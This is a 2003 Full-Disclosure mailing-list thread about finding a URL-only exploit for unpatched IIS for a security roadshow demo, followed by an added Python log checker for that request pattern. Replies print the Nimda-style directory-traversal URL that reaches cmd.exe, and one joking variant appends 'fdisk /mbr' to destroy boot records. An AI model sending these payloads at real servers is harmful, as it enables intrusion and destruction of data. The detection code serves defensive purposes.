RE: [Full-Disclosure] Unusual request

From: Sung J. Choe (schoe@oicinc.com)
Date: 02/13/03

    From: "Sung J. Choe" <schoe@oicinc.com>
    To: "'Steve Wray'" <steve.wray@paradise.net.nz>
    Date: Wed, 12 Feb 2003 14:32:46 -1000
    

    > could give a demo of what M$ might have launched on the world
    > to get rid of dual-boot boxes!!
     
    It may be a bad idea to give Bill Gates and his M$ goons any ideas. Then
    again, those lamers who are dual-booting due to fear of the unknown should
    probably be more decisive and run linux and only linux. ;-p
     
    Sung J. Choe <SChoe[at]oicinc.com>, TICSA
    Systems Administrator, Facility Security Officer

    Oceanic Imaging Consultants, Inc. / www.oicinc.com
    Ph #: (808) 539-3634

    -----Original Message-----
    From: Steve Wray [mailto:steve.wray@paradise.net.nz]
    Sent: Wednesday, February 12, 2003 2:07 PM
    To: full-disclosure@lists.netsys.com
    Subject: RE: [Full-Disclosure] Unusual request

    I imagine that setting up a dual-boot Linux/Win2k box and
    sending it;
     
    http://victim.com/scripts/..%5c%5c../winnt/system32/cmd.exe%20fdisk%20/mbr
     
    could give a demo of what M$ might have launched on the world
    to get rid of dual-boot boxes!!
    ;)
    the '/' in '/mbr' may need to be escaped though.
     

    -----Original Message-----
    From: full-disclosure-admin@lists.netsys.com
    [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of Sung J. Choe
    Sent: Thursday, 13 February 2003 12:42 p.m.
    To: 'Paul Schmehl'
    Cc: 'full-disclosure@lists.netsys.com'
    Subject: RE: [Full-Disclosure] Unusual request

    > I am looking for an exploit that will give you "root" on
    > an unpatched IIS box by simply typing a string in the address line in
    > your browser.

    I don't know about "root"ing an IIS system but the NIMDA method of
    exploiting IIS via:
    http://victim.com/scripts/..%5c%5c../winnt/system32/cmd.exe
    seems to be a close match to what you are describing.

    .--------------------------------------------------.
    | Sung J. Choe <schoe[at]oicinc.com>, TICSA |
    | Systems Administrator, Facility Security Officer |
    .--------------------------------------------------.----.
                        | Oceanic Imaging Consultants, Inc. |
                        | Phone #: (808) 539-3634 x3634 |
                        .-----------------------------------.

    568D CAD6 53A0 92E6 4A2A 4E87 3BA0 5F90 37BB 8EE7

    > -----Original Message-----
    > From: Paul Schmehl [mailto:pauls@utdallas.edu]
    > Sent: Wednesday, February 12, 2003 1:26 PM
    > To: Full-Disclosure
    > Subject: [Full-Disclosure] Unusual request
    >
    >
    > The net is filled with so much junk now, it's getting harder to find
    > what you need. I am looking for an exploit that will give you "root" on
    > an unpatched IIS box by simply typing a string in the address line in
    > your browser. I know I've seen it before, but I can't seem to find it
    > amongst all the vulns for IIS and all the web logs that show up when you
    > google.
    >
    > I need this for a "security roadshow" that we're putting together, so I
    > can demonstrate how easy it is to break in to an unpatched box. Can
    > anybody point me in the right direction?
    >
    > I don't want exploit code. This is just a simple string that you enter
    > into the URL box in a browser. It's at least two or three years old, I
    > know.
    >
    > --
    > Paul Schmehl (pauls@utdallas.edu)
    > Adjunct Information Security Officer
    > The University of Texas at Dallas
    > http://www.utdallas.edu/~pauls/
    > AVIEN Founding Member
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html
    >

    
    

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
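
Added example, not part of the thread: a log check for the request form quoted in the messages above. It percent-decodes the request path, folds backslashes to slashes, and flags paths that contain a `..` segment and reach `cmd.exe`. The "METHOD URI STATUS" line layout and all function names are assumptions; the sample lines are constructed, the first one from the URL quoted in the thread.

```python
from urllib.parse import unquote

# Constructed sample lines in an assumed "METHOD URI STATUS" layout.
SAMPLE_LOG = [
    "GET /scripts/..%5c%5c../winnt/system32/cmd.exe 404",  # URL quoted in the thread
    "GET /downloads/cmd.exe.txt 200",                       # benign: different file name
    "GET /docs/../index.html 200",                          # benign: dot-dot, no shell
    "GET /docs/a%20b/index.html 200",                       # benign: encoded space
]

MAX_DECODE_ROUNDS = 3  # bound on repeated decoding


def normalize(uri: str) -> str:
    """Return the request path decoded, with '\\' folded to '/', lowercased."""
    path = uri.split("?", 1)[0]
    # Decode until stable so nested percent-encoding is normalized as well.
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()


def is_traversal_to_shell(uri: str) -> bool:
    """True if the normalized path has a '..' segment and names cmd.exe."""
    segments = [s for s in normalize(uri).split("/") if s]
    has_dotdot = ".." in segments
    # Text after an encoded space stays in the same segment, so compare
    # only the part of each segment before the first space.
    reaches_shell = any(s.split(" ", 1)[0] == "cmd.exe" for s in segments)
    return has_dotdot and reaches_shell


def flag(lines):
    """Return the log lines whose URI field matches the pattern."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 2 and is_traversal_to_shell(parts[1]):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for hit in flag(SAMPLE_LOG):
        print("suspicious:", hit)
```
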
